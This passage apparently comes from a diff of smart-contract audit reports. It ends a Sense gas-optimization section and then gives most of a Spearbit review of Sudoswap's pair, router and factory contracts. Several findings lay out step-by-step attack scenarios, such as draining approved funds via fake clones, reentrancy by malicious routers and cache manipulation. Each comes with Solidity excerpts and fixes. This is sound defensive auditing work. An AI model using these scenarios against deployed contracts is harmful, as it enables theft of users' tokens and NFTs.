This uses a relative large amount of gas as 9 parameters are retrieved of which only 2 are used. This also depends on the order of the elements in struct Series. For reference, consider the following snippet in Periphery.sol#L395, Periph- ery.sol#L407, and Periphery.sol#L559: 59 (address zero, , , , , , , , ) = Divider(divider).series(adapter, maturity); Recommendation: Create a function to only retrieve the zero and claim ad- dress from the contract Divider, i.e. have different functions for retrieving zero and claim. Sense: Fixed here. +3.5.9 Consolidate Mappings Accessed by Same Key Into Struct Severity: Gas Optimization Context: • Divider.sol#L58, Divider.sol#L73, Divider.sol#L67, • Divider.sol#L70, PoolManager.sol#L94-98 Situation: Multiple mappings are accessed by the same key in both Divider.sol and PoolManager.sol. Recommendation: Consolidating the multiple mappings into a struct could yield gains in code readability and gas optimization. Gas optimization could arise from packing smaller types into a single storage slot, thereby benefiting from improved warm storage access. This also po- tentially benefits the code-base from singular dirty slots for multiple variables, potentially saving significant gas costs by avoiding repeated clean slot writes. In the Divider.sol case, AdapterIDs appear as a very viable candidate to be packed, if it’s type size is reduced alongside the bool variable that identifies whether an adapter is enabled. In the PoolManager.sol case, the SeriesStatus enum and address could be packed into a single storage slot with the use of a struct. The team should research and consider if there are sufficient amount of vari- ables that could be lowered in type size and packed via a struct in the appro- priate order. Sense: Addressed in #155 Spearbit: We advice to also look into this issue in PoolManager.sol with the optimization ideas appended to it. 60 +3.5.10 Lower issuance And tilt In Divider.sol To uint46 / uint96 Severity: Gas Optimization Context: Divider.sol#177 Situation: This struct contains 3 address elements, which are less than 32 bytes. It does not end up using a whole storage slot. The issuance is a timestamp-based entity, and, therefore, could likely be low- ered to uint48 at least. It could fit into one of the commonly accessed ad- dresses. The tilt may be lowered as well and is currently packed with issuance. How- ever, if it can be lowered to a uint96, it could pack into another address element, thereby saving an additional storage slot. If it could be lowered to uint48, both issuance and tilt could be packed in the same slot as the address variable most accessed alongside them, yielding gas benefits from warm access and dirty slot sharing. Recommendation: The Sense team should explore if both can be safely low- ered for their logic, if they wish to realize these gains. The gains will only come in the case of them being able to go down to uint48 / uint96 at least respec- tively. +3.5.11 Redundant fdivUp Severity: Gas Optimization Context: GClaimManager.sol#L109-L130 Situation: In the function, excess() does a fdivUp, with a multiplication by FixedMath.WAD followed by a division by 10**18. As FixedMath.WAD == 10**18, this does not do anything. function excess(...) public returns (uint256 tBal) { ... if (scale - initScale > 0) { tBal = ((uBal.fmul(scale, FixedMath.WAD)).fdiv(scale - initScale, ,! 
FixedMath.WAD)).fdivUp( 10**18, FixedMath.WAD ); } } // same as FixedMath.WAD 61 Recommendation: Spearbit recommends checking if the above call to fdi- vUp() can be removed. Note: GClaimManager will most likely be deprecated. This issue is included for completeness. 62 diff --git a/findings_newupdate/spearbit/Sudoswap-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Sudoswap-Spearbit-Security-Review.txt new file mode 100644 index 0000000..d3896cf --- /dev/null +++ b/findings_newupdate/spearbit/Sudoswap-Spearbit-Security-Review.txt @@ -0,0 +1,34 @@ +3.1.1 Clones with malicious extradata are also considered valid clones Severity: Critical Risk Context: LSSVMPairCloner.sol#L121, LSSVMPair.sol#L687-695, LSSVMRoute r.sol#L574-594, LSSVMPairFactory.sol#L223-257, LSSVMPairCloner.sol#L206- 232 Description: Spearbit discovered that the functions verifying if a contract is a pair do so by only checking the first 54 bytes (i.e. the Proxy code). An attacker could deploy a contract that starts with the first 54 bytes of proxy code but have a malicious payload, and these functions will still verify it as a legitimate clone. We have found this to be a critical issue based on the feasibility of a potential exploit. Consider the following scenario: 1. An attacker creates a malicious pair by making a copy of the source of cloneETHPair() supplying malicious values for factory, bondingCurve, nft and poolType using a valid template for the connected contract. 2. The attacker has a contract with valid proxy code, connected to a valid template, but the rest of the parameters are invalid. 3. The Pair is initialized via a copy of initialize() of LSSVMPair, which calls __Ownable_init() to set a malicious owner. 4 4. The malicious owner calls call(), with target equal to the router contract and the calldata for the function pairTransferERC20From(): // Owner is set by pair creator function call(address payable target, bytes calldata data) external onlyOwner { // Factory is malicious LSSVMPairFactoryLike _factory = factory(); // `callAllowed()` is malicious and returns true require(_factory.callAllowed(target), "Target must be whitelisted"); (bool result, ) = target.call{value: 0}(data); require(result, "Call failed"); ,! } 5. The check for onlyOwner and require pass, therefore pairTransferERC20From() is called with the malicious Pair as msg.sender. 6. The router checks if it is called from a valid pair via isPair(): function pairTransferERC20From(...) external { // Verify caller is a trusted pair contract // The malicious pair passed this test require(factory.isPair(msg.sender, variant), "Not pair"); ... token.safeTransferFrom(from, to, amount); } 7. Because the function isPair() only checks the first 54 bytes (the runtime code including the implementation address), isPair() does not check for extra parameters factory, bondingCurve, nft or poolType: 5 function isPair(address potentialPair, PairVariant variant) ... { ... } else if (variant == PairVariant.ENUMERABLE_ETH) { return ,! LSSVMPairCloner.isETHPairClone(address(enumerableETHTemplate),potentialPair); } ... } function isETHPairClone(address implementation, address query) ... { ... // Compare expected bytecode with that of the queried contract let other := add(ptr, 0x40) extcodecopy(query, other, 0, 0x36) result := and( eq(mload(ptr), mload(other)), // Checks 32 + 22 = 54 bytes eq(mload(add(ptr, 0x16)), mload(add(other, 0x16))) ) } 8. 
Now the malicious pair is considered valid, the require statement in pair- TransferERC20From() has passed and tokens can be transferred to the attacker from anyone who has set an allowance for the router. Recommendation: Spearbit recommends Sudoswap to verify more values when checking if a pair is valid - especially the factory value. We also rec- ommend to consider the removal of all trust between pairs and routers, as well as the function call(). Sudoswap: Added factory check to isPair functions here. Spearbit: Acknowledged. Please double-check with the changes for the finding "Saving 1 byte Off The Constructor() Code" - especially the amount of bytes checked at the end of isETHPairClone() and isERC20PairClone(). 3.2 High Risk +3.2.1 Factory Owner can steal user funds approved to the Router Severity: High Risk Context: LSSVMPair.sol#L687-695, LSSVMRouter.sol#L574 Description: A pair owner can make arbitrary calls to any contract that has been approved by the factory owner. The code in the factory intends to prevent 6 router contracts from being approved for calls because router contracts can have access to user funds. An example includes the pairTransferERC20From() function, that can be used to steal funds from any account which has given it approval. The router contracts can nevertheless be whitelisted by first being removed as a router and then being whitelisted. This way anyone can deploy a pair and use the call function to steal user funds. Recommendation: Spearbit recommends Sudoswap to consider changing the architecture such that the router simply sends the NFTs to the pair when it calls the swap function. If you want to remove the trust from the router, make the pair store reserve balances and check tokens received against it. Sudoswap: The immediate issue of adding/removing routers are addressed in this branch here. Every time a new router is added or removed, we only toggle the allowed flag, while wasEverAllowed is always true. LSSVMPair.call() now checks if we’ve ever approved a Router. The broader issue of factory owner being able to potentially to steal pool funds is acknowledged, with other specific vectors mentioned in the audit addressed in other branches. Spearbit: Acknowledged. 3.3 Medium Risk +3.3.1 Missing check in the number of Received Tokens when tokens are transferred directly Severity: Medium Risk Context: LSSVM\contracts, LSSVMPairERC20.sol#L41-78 Description: Within the function _validateTokenInput() of LSSVMPairERC20, two methods exist to transfer tokens. In the first method via router.pairTrans ferERC20From() a check is performed on the number of received tokens. In the second method no checks are done. Recent hacks (e.g. Qubit finance) have successfully exploited safeTransfer- From() functions which did not revert nor transfer tokens. Additionally, with malicious or re-balancing tokens the number of transferred tokens might be dif- ferent from the amount requested to be transferred. 7 function _validateTokenInput(...) ... { ... if (isRouter) { ... // Call router to transfer tokens from user uint256 beforeBalance = _token.balanceOf(_assetRecipient); router.pairTransferERC20From(...) // Verify token transfer (protect pair against malicious router) require( _token.balanceOf(_assetRecipient) - beforeBalance == ,! 
inputAmount, "ERC20 not transferred in"); } else { // Transfer tokens directly _token.safeTransferFrom(msg.sender, _assetRecipient, inputAmount); } } Recommendation: Spearbit recommends Sudoswap to verify the number of tokens received when these are transferred directly. Sudoswap: Risks acknowledged but no changes at this time. Pair creators would have to willingly create deploy an NFT/Token pair for a Token using non- standard ERC20 token behavior to be at risk. Spearbit: Acknowledged. +3.3.2 Malicious assetRecipient could get an unfair amount of tokens Severity: Medium Risk Context: LSSVMRouter.sol#L754-789 Description: The function _swapNFTsForToken() of LSSVMRouter calls safe- TransferFrom(), which then calls ERC721Received of assetRecipient. A ma- licious assetRecipient could manipulate its NFT balance by buying additional NFTs via the Pair and sending or selling them back to the Pair, enabling the malicious actor to obtain an unfair amount of tokens via routerSwapNFTsForTo- ken(). 8 function _swapNFTsForToken(...) ... { ... swapList[i].pair.cacheAssetRecipientNFTBalance(); ... for (uint256 j = 0; j < swapList[i].nftIds.length; j++) { ,! ,! nft.safeTransferFrom(msg.sender,assetRecipient,swapList[i].nftIds[j]); // call to onERC721Received of assetRecipient } ... outputAmount += swapList[i].pair.routerSwapNFTsForToken(tokenRecipient); // checks the token balance of assetRecipient } ,! ,! } Recommendation: Spearbit recommends Sudoswap to implement re-entrancy modifiers (see finding "Add Reentrancy Guards" in the "Low Risk" section of this report). We also recommend that Sudoswap implements the recommendation "Simplify the Connection Between Pair and Router" in the "Gas Optimizations" section of this report to reduce the attack surface. Finally, we recommend that Sudoswap make sure the assetRecipient is trusted. Sudoswap: We’ve also accepted the recommendation to simplify the connec- tion between the Router and the Pair, provided fix is in the issue here. Spearbit: Acknowledged. +3.3.3 Malicious Router can exploit cacheAssetRecipientNFTBalance to drain pair funds Severity: Medium Risk Context: LSSVMPair.sol#L371-379, LSSVMPair.sol#L318-366 Description: A malicious router could be whitelisted by an inattentive or a ma- licious factory owner and drain pair funds in the following exploit scenario: 1. Call the cache function. Suppose that the current balance is 10, so it gets cached. 2. Sell 5 NFTs to the pair and get paid using swapNFTsForToken. Total bal- ance is now 15 but the cached balance is still 10. 3. Call routerSwapNFTsForToken. This function will compute total_balance 9 - cached_balance, assume 5 NFTs have been sent to it and pay the user. However, no new NFTs have been sent and it already paid for them in Step 2. Recommendation: Spearbit recommends Sudoswap to implement reentrancy modifiers (see finding "Add Reentrancy Guards" in the "Low Risk" section of this report). We also suggest implementing recommendations in the "Simplify the Connection between Pair and Router" found in the "Gas Optimization" section of this report to reduce attack surface. Sudoswap: Removed this flow through the implementation of the recommen- dation here. Spearbit: Acknowledged. +3.3.4 Malicious Router can steal NFTs via Re-Entrancy attack Severity: Medium Risk Context: LSSVMPair.sol, LSSVMPairERC20.sol Description: If the factory owner approves a malicious _router, it is possible for the malicious router to call functions like swapTokenForAnyNFTs() and set is- Router to true. 
Once that function reaches router.pairTransferERC20From() in _validateTokenInput(), the router can re-enter the pair and call swapTokenForAnyNFTs() again. The second time the function reaches router.pairTransferERC20From(), the malicious router executes a token transfer so that the require of _validateTokenInput() is satisfied when the context returns to the pair. When the context then returns from the reentrant call back to the original call, the require of _validateTokenInput() still passes, because the balance was cached before the reentrant call. Therefore, an attacker will receive 2 NFTs while sending tokens only once.

Recommendation: Spearbit recommends Sudoswap to implement reentrancy modifiers (see finding "Add Reentrancy Guards" in the "Low Risk" section of this report). Sudoswap should also consider checking whether the NFT balance before and after router.pairTransferERC20From() is the same. Finally, we recommend making sure the following contracts and addresses are trusted: the NFT contract, the ERC-20 tokens, the assetRecipient, the bonding curve, the factory, the factory owner, and the protocolFeeRecipient.

Sudoswap: The immediate issue is addressed in this branch. We now validate NFT balances after the router.pairTransferERC20From call to mitigate re-entrant balance changes by a malicious router. The broader issue of the cache function being exploitable is addressed in the GitHub Issue about simplifying the connection between the pair and the router.

Spearbit: Acknowledged.

+3.3.5 getAllHeldIds() of LSSVMPairMissingEnumerable is vulnerable to a denial of service attack Severity: Medium Risk Context: LSSVMPairMissingEnumerable.sol#L90-97, LSSVMPair.sol#L125

Description: The contract LSSVMPairMissingEnumerable tries to compensate for NFT contracts that do not have ERC721Enumerable implemented. However, this cannot be done for everything, as it is possible to use transferFrom() to send an NFT from the same collection to the Pair. In that case the callback onERC721Received() will not be triggered, and the idSet administration of LSSVMPairMissingEnumerable will not be updated. This means that nft().balanceOf(address(this)) can be different from the number of elements in idSet. Assuming an actor accidentally, or on purpose, uses transferFrom() to send additional NFTs to the Pair, getAllHeldIds() will fail, as idSet.at(i) for unregistered NFTs will fail. This can be used in a griefing attack. getAllHeldIds() in LSSVMPairMissingEnumerable:

    function getAllHeldIds() external view override returns (uint256[] memory) {
        // returns the registered + unregistered NFTs
        uint256 numNFTs = nft().balanceOf(address(this));
        uint256[] memory ids = new uint256[](numNFTs);
        for (uint256 i; i < numNFTs; i++) {
            ids[i] = idSet.at(i); // will fail at the unregistered NFTs
        }
        return ids;
    }

The following checks performed with _nft.balanceOf() might not be accurate in combination with LSSVMPairMissingEnumerable. The risk is low, because with additional NFTs present, later calls to _sendAnyNFTsToRecipient() and _sendSpecificNFTsToRecipient() will fail. However, this might make it more difficult to troubleshoot issues.

    function swapTokenForAnyNFTs(...) ... {
        ...
        require((numNFTs > 0) && (numNFTs <= _nft.balanceOf(address(this))), "Ask for > 0 and <= balanceOf NFTs");
        ...
        _sendAnyNFTsToRecipient(_nft, nftRecipient, numNFTs); // could fail
        ...
    }

    function swapTokenForSpecificNFTs(...) ... {
        ...
        require((nftIds.length > 0) && (nftIds.length <= _nft.balanceOf(address(this))), "Must ask for > 0 and < balanceOf NFTs"); // '<' should be '<='
        ...
        _sendSpecificNFTsToRecipient(_nft, nftRecipient, nftIds); // could fail
        ...
    }

Note: The error string < balanceOf NFTs is not accurate.

Recommendation: Spearbit recommends Sudoswap to use idSet.length() in order to determine the number of NFTs, by changing the code in accordance with the following diff:

    - uint256 numNFTs = nft().balanceOf(address(this));
    + uint256 numNFTs = idSet.length();

To access idSet.length() from LSSVMPair, an extra function is necessary in LSSVMPairMissingEnumerable.sol and LSSVMPairEnumerable.sol. Spearbit also suggests fixing the error string in swapTokenForSpecificNFTs().
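For illustration, a minimal sketch of such an accessor (the function name and visibility are hypothetical, chosen here only to show the shape of the change):

    // In LSSVMPairMissingEnumerable.sol: expose the idSet size so that
    // LSSVMPair can use it instead of nft().balanceOf(address(this))
    function _numHeldNFTs() internal view returns (uint256) {
        return idSet.length();
    }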
Sudoswap: Addressed in this branch here. The idSet size is now used instead of the NFT balanceOf.

Spearbit: Acknowledged.

+3.3.6 With NFT pools the protocol fees end up in assetRecipient instead of _factory Severity: Medium Risk Context: LSSVMPair.sol#L192-245, LSSVMPairERC20.sol#L90-105, LSSVMPairETH.sol#L53-66

Description: Assume a scenario where an NFT pool with an assetRecipient set has the received funds sent directly to the assetRecipient. Now suppose a user executes swapTokenForSpecificNFTs(). The function _validateTokenInput() sends the required input funds, including fees, to the assetRecipient. The function _payProtocolFee() tries to send the fees to the _factory. However, this function attempts to do so from the pair contract, and the pair contract does not have any funds, because they have been sent directly to the assetRecipient. So _payProtocolFee() lowers the fee to 0 and sends this amount to the _factory. The fees thus end up at the assetRecipient instead of at the _factory.

Note:
• The same issue occurs in swapTokenForAnyNFTs().
• This issue occurs with both ETH and ERC20 NFT Pools, although their logic is slightly different.
• This issue occurs both when swapTokenForSpecificNFTs() is called directly as well as indirectly via the LSSVMRouter.
• Although the pool fees are 0 with NFT pools, the factory fee is still present.
• Luckily, TRADE pools cannot have an assetRecipient, as this would also create issues.

    abstract contract LSSVMPair is Ownable, ReentrancyGuard {
        ...
        function swapTokenForSpecificNFTs(...) external payable virtual returns (uint256 inputAmount) {
            ...
            // sends inputAmount to assetRecipient
            _validateTokenInput(inputAmount, isRouter, routerCaller, _factory);
            _sendSpecificNFTsToRecipient(_nft, nftRecipient, nftIds);
            _refundTokenToSender(inputAmount);
            _payProtocolFee(_factory, protocolFee);
            ...
        }
    }

    abstract contract LSSVMPairERC20 is LSSVMPair {
        ...
        function _payProtocolFee(LSSVMPairFactoryLike _factory, uint256 protocolFee) internal override {
            ...
            uint256 pairTokenBalance = _token.balanceOf(address(this));
            if (protocolFee > pairTokenBalance) {
                protocolFee = pairTokenBalance;
            }
            // tries to send from the Pair contract
            _token.safeTransfer(address(_factory), protocolFee);
        }
    }

    abstract contract LSSVMPairETH is LSSVMPair {
        function _payProtocolFee(LSSVMPairFactoryLike _factory, uint256 protocolFee) internal override {
            ...
            uint256 pairETHBalance = address(this).balance;
            if (protocolFee > pairETHBalance) {
                protocolFee = pairETHBalance;
            }
            // tries to send from the Pair contract
            payable(address(_factory)).safeTransferETH(protocolFee);
        }
    }
Recommendation: Spearbit recommends Sudoswap to first be aware of the following:
• In ETH NFT pools, ETH is first sent to the Pair contract, then to other parties.
• In ERC20 NFT pools, ERC20 tokens are sent directly from the original caller to other parties. This means that when an assetRecipient is set, the ERC20 does not touch the pair.

Second, we recommend that Sudoswap change swapTokenForSpecificNFTs() as such:

    function swapTokenForSpecificNFTs(...) external payable virtual returns (uint256 inputAmount) {
        ...
    -   _validateTokenInput(inputAmount, isRouter, routerCaller, _factory);
    +   _validateTokenInput(inputAmount - protocolFee, isRouter, routerCaller, _factory);
        ...
    -   _payProtocolFee(_factory, protocolFee);
    +   _payProtocolFeeByOriginalCaller(_factory, protocolFee, isRouter, routerCaller);
    }

We also recommend that Sudoswap perform the same update for swapTokenForAnyNFTs(). Third, we recommend creating a new _payProtocolFeeByOriginalCaller() in LSSVMPairERC20 that combines the functionality of _payProtocolFee() and _validateTokenInput(), due to the assumption that the function should also be able to retrieve the ERC20 tokens from the original caller. Note: _payProtocolFeeByOriginalCaller() in LSSVMPairETH can just do the same as _payProtocolFee(). Lastly, it may be wise for Sudoswap to consider renaming _payProtocolFee() to _payProtocolFeeFromPair(), clarifying the difference. Note: The functionality of _payProtocolFeeFromPair() is still necessary for routerSwapNFTsForToken() and swapNFTsForToken(), because in that case the funds are indeed in the Pair.

Sudoswap: Addressed in the branch here. Pulling tokens and taking the protocol fee is now done in the same step when swapping from tokens to NFTs, so there should always be tokens to send for the fee. The original _payProtocolFee function has been renamed _payProtocolFeeFromPair as suggested.

Spearbit: Acknowledged.

+3.3.7 Error codes of Quote functions are unchecked Severity: Medium Risk Context: LSSVMPair.sol#L389-431, LSSVMRouter.sol

Description: The error return values of the functions getBuyNFTQuote() and getSellNFTQuote() are not checked in contract LSSVMRouter.sol, whereas other functions in contract LSSVMPair.sol do check for error == CurveErrorCodes.Error.OK.

    abstract contract LSSVMPair is Ownable, ReentrancyGuard {
        ...
        function getBuyNFTQuote(uint256 numNFTs) external view returns (CurveErrorCodes.Error error, ...) {
            (error, ...) = bondingCurve().getBuyInfo(...);
        }

        function getSellNFTQuote(uint256 numNFTs) external view returns (CurveErrorCodes.Error error, ...) {
            (error, ...) = bondingCurve().getSellInfo(...);
        }

        function swapTokenForAnyNFTs(...) external payable virtual returns (uint256 inputAmount) {
            ...
            (error, ...) = _bondingCurve.getBuyInfo(...);
            require(error == CurveErrorCodes.Error.OK, "Bonding curve error");
            ...
        }
    }

LSSVMRouter.sol#L526:

    (, , pairOutput, ) = swapList[i].pair.getSellNFTQuote(...);

The following contract lines contain the same code snippet below: LSSVMRouter.sol#L360, LSSVMRouter.sol#L407, LSSVMRouter.sol#L450, LSSVMRouter.sol#L493, LSSVMRouter.sol#L627, LSSVMRouter.sol#L664

    (, , pairCost, ) = swapList[i].pair.getBuyNFTQuote(...);

Note: The current Curve contracts, which implement the getBuyNFTQuote() and getSellNFTQuote() functions, have a limited number of potential errors. However, future Curve contracts might add additional error codes.

Recommendation: Check the error code of the functions getBuyNFTQuote() and getSellNFTQuote() in contract LSSVMRouter.sol.
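For illustration, a minimal sketch of such a check at the router call sites, following the require pattern that LSSVMPair.sol already uses (arguments elided as in the snippets above):

    // Capture and check the error code instead of discarding it
    (CurveErrorCodes.Error error, , pairCost, ) = swapList[i].pair.getBuyNFTQuote(...);
    require(error == CurveErrorCodes.Error.OK, "Bonding curve error");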
Sudoswap: Addressed in this branch here. LSSVMRouter now reverts if the Error is not Error.OK for a normal swap, or skips performing the swap during a robust swap operation.

Spearbit: Acknowledged.

3.4 Low Risk

+3.4.1 Swaps can be front run by Pair Owner to extract any profit from slippage allowance Severity: Low Risk Context: LSSVMPair.sol#L630, LSSVMPair.sol#L644, LSSVMPair.sol#L660

Description: If the user adds a nonzero slippage allowance, the pair owner can front-run the swap to increase the fee/spot price and steal all of the slippage allowance. This makes sandwich attacks much easier and cheaper to execute for the pair owner.

Recommendation: Spearbit recommends that Sudoswap add a time delay of a few hours between the pair owner submitting a new price/fee/delta and such changes coming into effect. If this is not ideal for Sudoswap, Spearbit alternatively recommends disallowing changes to these parameters and requiring the pair owner to deploy a new pair instead.

Sudoswap: Acknowledged, but no changes have been made to the pricing model at this time. Still talking internally about what sort of time delay would be acceptable for a spotPrice change and how to change the pricing logic if so.

Spearbit: Acknowledged.

+3.4.2 Add check for numItems == 0 Severity: Low Risk Context: LinearCurve.sol#L38-58, ExponentialCurve.sol#L45-65, LinearCurve.sol#L100-120, ExponentialCurve.sol#L108-129

Description: The functions getBuyInfo() and getSellInfo() in LinearCurve.sol check that numItems != 0. However, the same getBuyInfo() and getSellInfo() functions in ExponentialCurve.sol do not perform this check.

    contract LinearCurve is ICurve, CurveErrorCodes {
        function getBuyInfo(...) ... {
            // We only calculate changes for buying 1 or more NFTs
            if (numItems == 0) {
                return (Error.INVALID_NUMITEMS, 0, 0, 0);
            }
            ...
        }

        function getSellInfo(...) ... {
            // We only calculate changes for selling 1 or more NFTs
            if (numItems == 0) {
                return (Error.INVALID_NUMITEMS, 0, 0, 0);
            }
            ...
        }
    }

    contract ExponentialCurve is ICurve, CurveErrorCodes {
        function getBuyInfo(...) ... {
            // No check on `numItems`
            uint256 deltaPowN = delta.fpow(numItems, FixedPointMathLib.WAD);
            ...
        }

        function getSellInfo(...) ... {
            // No check on `numItems`
            uint256 invDelta = FixedPointMathLib.WAD.fdiv(delta, FixedPointMathLib.WAD);
            ...
        }
    }

If the code remains unchanged, an erroneous situation may not be caught and funds might be sent when selling 0 NFTs. Luckily, when numItems == 0 the resulting outputValue of the functions in ExponentialCurve is still 0, so there is no real issue. However, it is still important to fix this, because a derived version of these functions might be used by future developers.

Recommendation: Spearbit recommends adding a check for numItems == 0 to getBuyInfo() and getSellInfo() of ExponentialCurve.sol.
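For illustration, a sketch of the recommended entry check, mirroring the guard already present in LinearCurve (shown above):

    // At the top of ExponentialCurve.getBuyInfo() and getSellInfo()
    if (numItems == 0) {
        return (Error.INVALID_NUMITEMS, 0, 0, 0);
    }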
Sudoswap: Addressed in branch here.

Spearbit: Acknowledged.

+3.4.3 Disallow arbitrary function calls to LSSVMPairETH Severity: Low Risk Context: LSSVMPairETH.sol#L133-139

Description: The contract LSSVMPairETH contains an open fallback() function. The fallback() is most likely necessary because the proxy appends calldata to every call, so plain ETH transfers do not reach the receive() function. However, without additional checks any function call to an ETH Pair will succeed. This could result in unforeseen scenarios which hackers could potentially exploit.

    fallback() external payable {
        emit TokenDeposited(msg.value);
    }

Recommendation: Spearbit recommends adapting the fallback() function in the following way to ameliorate this risk:

      fallback() external payable {
    +     // only allow calls without a function selector
    +     require(msg.data.length == _immutableParamsLength());
          emit TokenDeposited(msg.value);
      }

Sudoswap: Addressed here.

Spearbit: Acknowledged.

+3.4.4 Only transfer relevant funds for PoolType Severity: Low Risk Context: LSSVMPairFactory.sol#L363-416

Description: The functions _initializePairETH() and _initializePairERC20() allow for the transfer of ETH/ERC20 and NFTs even when this is not relevant for the PoolType. Although funds can be rescued from the Pair, it is perhaps better to prevent these types of mistakes.

    function _initializePairETH(...) ... {
        ...
        // Transfer initial ETH to pair
        // Only relevant for PoolType.TOKEN or PoolType.TRADE
        payable(address(_pair)).safeTransferETH(msg.value);
        ...
        // Transfer initial NFTs from sender to pair
        for (uint256 i = 0; i < _initialNFTIDs.length; i++) {
            // Only relevant for PoolType.NFT or PoolType.TRADE
            _nft.safeTransferFrom(msg.sender, address(_pair), _initialNFTIDs[i]);
        }
    }

    function _initializePairERC20(...) ... {
        ...
        // Transfer initial tokens to pair
        // Only relevant for PoolType.TOKEN or PoolType.TRADE
        _token.safeTransferFrom(msg.sender, address(_pair), _initialTokenBalance);
        ...
        // Transfer initial NFTs from sender to pair
        for (uint256 i = 0; i < _initialNFTIDs.length; i++) {
            // Only relevant for PoolType.NFT or PoolType.TRADE
            _nft.safeTransferFrom(msg.sender, address(_pair), _initialNFTIDs[i]);
        }
    }

Recommendation: Spearbit recommends Sudoswap to only transfer the ETH/ERC20/NFTs that are relevant for the Pair's PoolType.

Sudoswap: Acknowledged, but no change for now. Clients will be responsible for ensuring users deposit the correct assets, and the existence of rescue functions makes it possible to correct mistakes.

Spearbit: Acknowledged.

+3.4.5 Check for 0 parameters Severity: Low Risk Context: LSSVMPairFactory.sol#L291-356

Description: The functions setCallAllowed() and setBondingCurveAllowed() do not check that target != 0, while the comparable function setRouterAllowed() does check for _router != 0.

    function setCallAllowed(address payable target, bool isAllowed) external onlyOwner {
        ...
        // No check on target
        callAllowed[target] = isAllowed;
    }

    function setBondingCurveAllowed(ICurve bondingCurve, bool isAllowed) external onlyOwner {
        ...
        // No check on bondingCurve
        bondingCurveAllowed[bondingCurve] = isAllowed;
    }

    function setRouterAllowed(LSSVMRouter _router, bool isAllowed) external onlyOwner {
        require(address(_router) != address(0), "0 router address");
        ...
        routerAllowed[_router] = isAllowed;
    }

Recommendation: Spearbit recommends Sudoswap to consider adding a check for 0 parameters in setCallAllowed() and setBondingCurveAllowed(). If 0 checks are considered unnecessary because these functions are protected by onlyOwner, then the 0 check could be removed from setRouterAllowed().

Sudoswap: Removed the zero-address check in setRouterAllowed for consistency here.

Spearbit: Acknowledged.

+3.4.6 Potentially undetected underflow in assembly Severity: Low Risk Context: LSSVMPair.sol#L447-494, LSSVMPairERC20.sol#L24-32

Description: The functions factory(), bondingCurve(), nft(), poolType(), and token() have an assembly-based calculation where paramsLength is subtracted from calldatasize(). Assembly disregards underflow checks, so if too few parameters are supplied in calls to the functions in the LSSVMPair contract, this calculation may underflow, resulting in the values for factory(), bondingCurve(), nft(), poolType(), and token() being read from unexpected pieces of memory. These will usually be zeroed, so execution will stop at some point. However, it is safer to prevent this from ever happening.

    function factory() public pure returns (LSSVMPairFactoryLike _factory) {
        ...
        assembly { _factory := shr(0x60, calldataload(sub(calldatasize(), paramsLength))) }
    }

    function bondingCurve() public pure returns (ICurve _bondingCurve) {
        ...
        assembly { _bondingCurve := shr(0x60, calldataload(add(sub(calldatasize(), paramsLength), 20))) }
    }

    function nft() public pure returns (IERC721 _nft) {
        ...
        assembly { _nft := shr(0x60, calldataload(add(sub(calldatasize(), paramsLength), 40))) }
    }

    function poolType() public pure returns (PoolType _poolType) {
        ...
        assembly { _poolType := shr(0xf8, calldataload(add(sub(calldatasize(), paramsLength), 60))) }
    }

    function token() public pure returns (ERC20 _token) {
        ...
        assembly { _token := shr(0x60, calldataload(add(sub(calldatasize(), paramsLength), 61))) }
    }

Recommendation: Spearbit recommends Sudoswap to implement the following changes for all functions, so that an underflow will be detected at the Solidity level:

    + uint256 offset = msg.data.length - paramsLength;
    - assembly { _token := shr(..., calldataload(add(sub(calldatasize(), paramsLength), ...))) }
    + assembly { _token := shr(..., calldataload(add(offset, ...))) }
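For illustration, a sketch of the token() getter after this change (the offset and shift are taken from the snippet above; how paramsLength is obtained is assumed here, using the _immutableParamsLength() helper mentioned earlier in this report):

    function token() public pure returns (ERC20 _token) {
        uint256 paramsLength = _immutableParamsLength();
        // Computed in Solidity, so an underflow reverts instead of
        // silently wrapping around as it would inside assembly
        uint256 offset = msg.data.length - paramsLength;
        assembly { _token := shr(0x60, calldataload(add(offset, 61))) }
    }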
Sudoswap: Acknowledged, but no change for now, as we only use this pattern for the purpose of reading variables meant to be immutable, so all values are hard-coded, which makes the possibility of underflow unlikely.

Spearbit: Acknowledged.

+3.4.7 Check number of NFTs is not 0 Severity: Low Risk Context: LSSVMPair.sol#L258-310, LSSVMPair.sol#L318-366, LSSVMPair.sol#L413-431

Description: The functions swapNFTsForToken(), routerSwapNFTsForToken(), and getSellNFTQuote() in LSSVMPair.sol do not perform input verification on the number of NFTs. If _bondingCurve.getSellInfo() accidentally happens to return a non-zero value, then an unfair amount of tokens will be given back to the caller. The current two versions of bondingCurve do return 0, but a future version might accidentally return non-zero.

Note:

1. getSellInfo() is supposed to return an error when numNFTs == 0, but this does not always happen, and the error code is not always checked.

    function swapNFTsForToken(uint256[] calldata nftIds, ...) external virtual returns (uint256 outputAmount) {
        ...
        // No check on `nftIds.length`
        (error, newSpotPrice, outputAmount, protocolFee) = _bondingCurve.getSellInfo(..., nftIds.length, ...);
        ...
    }

    function routerSwapNFTsForToken(address payable tokenRecipient) ... {
        ...
        uint256 numNFTs = _nft.balanceOf(getAssetRecipient()) - _assetRecipientNFTBalanceAtTransferStart;
        ...
        // No check that `numNFTs > 0`
        (error, newSpotPrice, outputAmount, protocolFee) = _bondingCurve.getSellInfo(..., numNFTs, ...);
    }

    function getSellNFTQuote(uint256 numNFTs) ... {
        ...
        // No check that `numNFTs > 0`
        (error, newSpotPrice, outputAmount, protocolFee) = bondingCurve().getSellInfo(..., numNFTs, ...);
        ...
    }

2. For comparison, the function swapTokenForSpecificNFTs() does perform an entry check on the number of requested NFTs.

    function swapTokenForSpecificNFTs(uint256[] calldata nftIds, ...) ... {
        ...
        // There is a check on the number of requested NFTs
        require(
            (nftIds.length > 0) && (nftIds.length <= _nft.balanceOf(address(this))),
            "Must ask for > 0 and < balanceOf NFTs"); // check is present
        ...
    }

Recommendation: Spearbit recommends Sudoswap to implement checks and make sure the number of NFTs is greater than 0.
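For illustration, a minimal sketch of such entry checks, mirroring the guard that swapTokenForSpecificNFTs() already has (the error strings are illustrative):

    // At the top of swapNFTsForToken():
    require(nftIds.length > 0, "Must ask for > 0 NFTs");

    // At the top of routerSwapNFTsForToken() and getSellNFTQuote():
    require(numNFTs > 0, "Must ask for > 0 NFTs");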
Sudoswap: Added a 0 check to the swapNFTForTokens function here.

Spearbit: Acknowledged.

+3.4.8 Avoid utilizing inside knowledge of functions Severity: Low Risk Context: LSSVMRouter.sol, LSSVMPair.sol, LSSVMPairETH.sol

